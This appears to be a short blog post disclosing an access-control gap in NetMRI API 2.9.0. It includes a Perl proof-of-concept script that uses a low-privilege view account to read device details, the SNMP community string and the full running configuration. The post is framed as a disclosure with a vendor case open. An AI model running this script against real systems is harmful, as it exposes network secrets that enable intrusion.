

Beware the NetMRI API 2.9.0 has a Security Gap in it



You might be cautious about having users with default - view role access to NetMRI and expect that they cannot read sensitive information, when they can via a simple Perl script.  There appears to be no authentication auditing either.  I haven't tested updating NetMRI via a Perl script, but I'd assume that this would work as well.  There is a case opened with Infoblox on the issue and it is being reviewed. I've included the Perl script below.  You will need to edit in your specific authentication information if you want to test.  Perl must be installed on your system as well (my apologies to the Perl experts, this was very Q&D).

# This script displays addresses for the device
# passed in from the command line.

use strict;
use warnings;
use NetMRI::API;
use NetMRI::API::Remote;
use NetMRI::API::Broker;


print "Started\n";

# get the device id from the command
# line as the first argument.
my $device_id = shift @ARGV;

# Connect to the NetMRI.
my $client = NetMRI::API->new({
    api_version => '2.9.0',
    username    => 'testuser',
    password    => 'testpassword',
    url         => 'https://a.b.c.d',
});
print "Authenticated\n";

# retrieve the device
# see NetMRI::API::Broker::Device for other methods
# available on $client->broker->device
my $device = $client->broker->device->show({ DeviceID => $device_id })->{device};

print "Name: ", $device->DeviceName, "\n";
print "Type: ", $device->DeviceType, "\n";
print "Assurance: ", $device->DeviceAssurance, "\n";
print "Vendor: ", $device->DeviceVendor, "\n";
print "Model: ", $device->DeviceModel, "\n";
print "IOS Version: ", $device->DeviceVersion, "\n";
print "Mgmt IP: ", $device->DeviceIPDotted, "\n";
print "MAC: ", $device->DeviceMAC, "\n";

my $snmpid = $client->broker->device->DeviceCommunity({ DeviceID => $device_id });
print "SNMP Community: ", $snmpid->{DeviceCommunity}, "\n";

my $runconfig = $client->broker->device->running_config_text({ DeviceID => $device_id });
print "\n\n\n##### RUNNING CONFIG #####\n\n", $runconfig->{running_config_text},"\n";

